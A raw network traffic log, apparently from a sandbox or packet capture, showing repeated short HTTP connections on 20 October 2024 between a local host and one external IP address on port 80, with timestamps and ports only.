Oct 20, 2024 22:48:18.301676989 CEST	80	49866	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:18.301704884 CEST	80	49866	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:18.301708937 CEST	49866	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:18.301748037 CEST	80	49866	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:18.301759005 CEST	49866	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:18.306806087 CEST	80	49866	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:18.306880951 CEST	80	49866	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:18.306931019 CEST	80	49866	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:18.306957960 CEST	80	49866	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:18.307008028 CEST	80	49866	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:18.307034969 CEST	80	49866	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:18.349143028 CEST	80	49866	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:19.686868906 CEST	80	49866	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:19.686960936 CEST	49866	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:19.687012911 CEST	49866	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:19.691993952 CEST	80	49866	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:19.799777031 CEST	49873	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:19.804788113 CEST	80	49873	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:19.804893017 CEST	49873	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:19.805001974 CEST	49873	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:19.805057049 CEST	49873	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:19.809916019 CEST	80	49873	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:19.810029030 CEST	49873	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:19.810045004 CEST	80	49873	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:19.810074091 CEST	80	49873	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:19.810096025 CEST	49873	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:19.810122967 CEST	49873	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:19.810126066 CEST	80	49873	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:19.810153961 CEST	80	49873	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:19.810177088 CEST	49873	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:19.810180902 CEST	80	49873	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:19.810192108 CEST	49873	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:19.810216904 CEST	80	49873	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:19.810228109 CEST	49873	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:19.810244083 CEST	80	49873	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:19.810261011 CEST	49873	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:19.810280085 CEST	49873	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:19.810318947 CEST	80	49873	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:19.814805984 CEST	80	49873	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:19.815201044 CEST	80	49873	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:19.815233946 CEST	80	49873	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:19.815310955 CEST	80	49873	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:19.815361023 CEST	80	49873	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:19.815407038 CEST	80	49873	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:19.815433025 CEST	80	49873	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:19.857033014 CEST	80	49873	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:21.131779909 CEST	80	49873	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:21.131853104 CEST	49873	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:21.131927967 CEST	49873	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:21.136857033 CEST	80	49873	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:21.237180948 CEST	49880	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:21.242110014 CEST	80	49880	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:21.242203951 CEST	49880	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:21.242285967 CEST	49880	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:21.242353916 CEST	49880	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:21.247324944 CEST	80	49880	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:21.247406960 CEST	49880	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:21.247553110 CEST	80	49880	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:21.247605085 CEST	80	49880	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:21.247622013 CEST	49880	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:21.247633934 CEST	80	49880	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:21.247672081 CEST	49880	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:21.247684956 CEST	80	49880	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:21.247709036 CEST	49880	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:21.247713089 CEST	80	49880	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:21.247756004 CEST	80	49880	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:21.247759104 CEST	49880	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:21.247782946 CEST	80	49880	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:21.247814894 CEST	80	49880	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:21.247817993 CEST	49880	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:21.247843027 CEST	80	49880	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:21.247848034 CEST	49880	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:21.252285957 CEST	80	49880	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:21.252816916 CEST	80	49880	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:21.252911091 CEST	80	49880	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:21.252938986 CEST	80	49880	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:21.252966881 CEST	80	49880	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:21.253043890 CEST	80	49880	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:21.293049097 CEST	80	49880	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:22.556006908 CEST	80	49880	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:22.556092024 CEST	49880	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:22.556157112 CEST	49880	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:22.561031103 CEST	80	49880	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:22.659423113 CEST	49890	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:22.666501999 CEST	80	49890	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:22.666579962 CEST	49890	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:22.666718960 CEST	49890	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:22.666791916 CEST	49890	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:22.671736956 CEST	80	49890	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:22.671768904 CEST	80	49890	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:22.671794891 CEST	49890	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:22.671819925 CEST	80	49890	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:22.671849012 CEST	80	49890	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:22.671849012 CEST	49890	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:22.671900988 CEST	80	49890	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:22.671928883 CEST	80	49890	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:22.671941996 CEST	49890	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:22.671974897 CEST	49890	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:22.671978951 CEST	80	49890	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:22.672008038 CEST	80	49890	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:22.672041893 CEST	80	49890	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:22.672041893 CEST	49890	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:22.672075033 CEST	80	49890	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:22.672075987 CEST	49890	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:22.677195072 CEST	80	49890	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:22.677223921 CEST	80	49890	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:22.677273989 CEST	80	49890	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:22.677301884 CEST	80	49890	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:22.677329063 CEST	80	49890	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:22.677874088 CEST	80	49890	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:22.721095085 CEST	80	49890	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:23.960091114 CEST	80	49890	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:23.960186958 CEST	49890	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:23.960247040 CEST	49890	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:23.965238094 CEST	80	49890	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:24.065378904 CEST	49896	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:24.070341110 CEST	80	49896	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:24.070439100 CEST	49896	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:24.070563078 CEST	49896	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:24.070607901 CEST	49896	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:24.075480938 CEST	80	49896	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:24.075510979 CEST	80	49896	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:24.075539112 CEST	49896	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:24.075553894 CEST	80	49896	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:24.075558901 CEST	49896	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:24.075608969 CEST	49896	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:24.075611115 CEST	80	49896	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:24.075642109 CEST	80	49896	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:24.075660944 CEST	49896	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:24.075670004 CEST	80	49896	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:24.075691938 CEST	49896	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:24.075697899 CEST	80	49896	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:24.075716019 CEST	49896	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:24.075737000 CEST	49896	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:24.075751066 CEST	80	49896	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:24.075778961 CEST	80	49896	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:24.075802088 CEST	49896	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:24.080122948 CEST	80	49896	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:24.080676079 CEST	80	49896	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:24.080703974 CEST	80	49896	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:24.080759048 CEST	80	49896	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:24.080786943 CEST	80	49896	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:24.080815077 CEST	80	49896	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:24.080847979 CEST	80	49896	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:24.121015072 CEST	80	49896	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:25.394709110 CEST	80	49896	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:25.394793034 CEST	49896	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:25.394880056 CEST	49896	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:25.399766922 CEST	80	49896	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:25.503485918 CEST	49902	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:25.508450031 CEST	80	49902	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:25.508534908 CEST	49902	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:25.508630991 CEST	49902	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:25.508688927 CEST	49902	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:25.513494968 CEST	80	49902	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:25.513600111 CEST	49902	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:25.513607025 CEST	80	49902	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:25.513636112 CEST	80	49902	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:25.513664007 CEST	49902	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:25.513664961 CEST	80	49902	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:25.513674974 CEST	49902	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:25.513712883 CEST	49902	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:25.513719082 CEST	80	49902	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:25.513746023 CEST	80	49902	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:25.513760090 CEST	49902	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:25.513775110 CEST	80	49902	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:25.513798952 CEST	49902	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:25.513803005 CEST	80	49902	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:25.513820887 CEST	49902	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:25.513829947 CEST	80	49902	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:25.513858080 CEST	49902	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:25.513863087 CEST	80	49902	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:25.518902063 CEST	80	49902	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:25.518955946 CEST	80	49902	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:25.518985033 CEST	80	49902	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:25.519033909 CEST	80	49902	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:25.519067049 CEST	80	49902	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:25.519092083 CEST	80	49902	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:25.519263029 CEST	80	49902	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:26.934230089 CEST	80	49902	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:26.934372902 CEST	49902	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:26.934418917 CEST	49902	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:26.939265966 CEST	80	49902	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:27.049736023 CEST	49913	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:27.192387104 CEST	80	49913	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:27.192534924 CEST	49913	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:27.192687035 CEST	49913	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:27.192738056 CEST	49913	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:27.198055029 CEST	80	49913	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:27.198084116 CEST	80	49913	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:27.198112011 CEST	80	49913	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:27.198115110 CEST	49913	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:27.198127031 CEST	49913	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:27.198163033 CEST	49913	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:27.198164940 CEST	80	49913	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:27.198194981 CEST	80	49913	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:27.198218107 CEST	49913	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:27.198225021 CEST	80	49913	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:27.198251009 CEST	49913	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:27.198254108 CEST	80	49913	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:27.198265076 CEST	49913	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:27.198282003 CEST	80	49913	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:27.198298931 CEST	49913	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:27.198309898 CEST	80	49913	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:27.198327065 CEST	49913	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:27.202605963 CEST	80	49913	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:27.203104019 CEST	80	49913	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:27.203233004 CEST	80	49913	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:27.203285933 CEST	80	49913	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:27.203314066 CEST	80	49913	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:27.203362942 CEST	80	49913	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:27.203407049 CEST	80	49913	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:27.245124102 CEST	80	49913	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:28.537106991 CEST	80	49913	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:28.537204027 CEST	49913	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:28.537275076 CEST	49913	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:28.542231083 CEST	80	49913	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:28.643440962 CEST	49919	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:28.649835110 CEST	80	49919	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:28.649909019 CEST	49919	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:28.650008917 CEST	49919	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:28.650068045 CEST	49919	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:28.655062914 CEST	80	49919	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:28.655092955 CEST	80	49919	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:28.655122042 CEST	49919	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:28.655122995 CEST	80	49919	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:28.655134916 CEST	49919	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:28.655164003 CEST	49919	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:28.655178070 CEST	80	49919	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:28.655205011 CEST	80	49919	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:28.655232906 CEST	49919	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:28.655241966 CEST	49919	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:28.655256033 CEST	80	49919	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:28.655282974 CEST	80	49919	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:28.655307055 CEST	49919	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:28.655308962 CEST	80	49919	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:28.655323029 CEST	49919	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:28.655339956 CEST	80	49919	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:28.655368090 CEST	49919	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:28.656790972 CEST	80	49919	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:28.660339117 CEST	80	49919	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:28.660367966 CEST	80	49919	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:28.660396099 CEST	80	49919	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:28.660434008 CEST	80	49919	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:28.660489082 CEST	80	49919	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:28.660516024 CEST	80	49919	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:28.705033064 CEST	80	49919	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:29.961808920 CEST	80	49919	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:29.961950064 CEST	49919	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:29.961992979 CEST	49919	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:29.966917038 CEST	80	49919	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:30.139767885 CEST	49924	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:30.145585060 CEST	80	49924	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:30.145663977 CEST	49924	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:30.147178888 CEST	49924	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:30.147247076 CEST	49924	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:30.152679920 CEST	80	49924	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:30.152729034 CEST	49924	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:30.152816057 CEST	80	49924	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:30.152844906 CEST	80	49924	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:30.152864933 CEST	49924	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:30.152873993 CEST	80	49924	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:30.152892113 CEST	49924	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:30.152925014 CEST	49924	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:30.152949095 CEST	80	49924	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:30.152976036 CEST	80	49924	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:30.152995110 CEST	49924	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:30.153003931 CEST	80	49924	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:30.153023958 CEST	49924	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:30.153032064 CEST	80	49924	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:30.153040886 CEST	49924	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:30.153075933 CEST	49924	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:30.153081894 CEST	80	49924	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:30.153234005 CEST	80	49924	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:30.158488989 CEST	80	49924	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:30.158641100 CEST	80	49924	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:30.158932924 CEST	80	49924	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:30.159106016 CEST	80	49924	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:30.159132004 CEST	80	49924	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:30.159159899 CEST	80	49924	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:30.201021910 CEST	80	49924	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:31.744772911 CEST	80	49924	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:31.744837046 CEST	49924	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:31.744889021 CEST	49924	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:31.749903917 CEST	80	49924	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:31.846718073 CEST	49934	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:31.852870941 CEST	80	49934	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:31.852953911 CEST	49934	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:31.853090048 CEST	49934	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:31.853171110 CEST	49934	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:31.858692884 CEST	80	49934	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:31.858724117 CEST	80	49934	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:31.858769894 CEST	49934	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:31.858774900 CEST	80	49934	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:31.858803034 CEST	80	49934	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:31.858819008 CEST	49934	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:31.858831882 CEST	80	49934	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:31.858854055 CEST	49934	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:31.858861923 CEST	80	49934	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:31.858889103 CEST	49934	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:31.858916044 CEST	49934	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:31.858933926 CEST	80	49934	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:31.858994961 CEST	49934	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:31.859069109 CEST	80	49934	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:31.859101057 CEST	80	49934	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:31.859127998 CEST	80	49934	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:31.859129906 CEST	49934	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:31.863888979 CEST	80	49934	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:31.863918066 CEST	80	49934	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:31.863949060 CEST	80	49934	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:31.863975048 CEST	80	49934	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:31.865292072 CEST	80	49934	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:31.865629911 CEST	80	49934	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:31.917124033 CEST	80	49934	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:33.289783955 CEST	80	49934	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:33.289901018 CEST	49934	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:33.289982080 CEST	49934	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:33.294814110 CEST	80	49934	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:33.393477917 CEST	49941	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:33.644229889 CEST	80	49941	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:33.644320965 CEST	49941	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:33.644505978 CEST	49941	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:33.644558907 CEST	49941	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:33.649276018 CEST	80	49941	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:33.649328947 CEST	49941	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:33.652373075 CEST	80	49941	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:33.652417898 CEST	80	49941	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:33.652430058 CEST	49941	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:33.652450085 CEST	49941	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:33.652535915 CEST	80	49941	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:33.652545929 CEST	80	49941	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:33.652594090 CEST	49941	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:33.652643919 CEST	80	49941	193.46.218.44	192.168.2.4
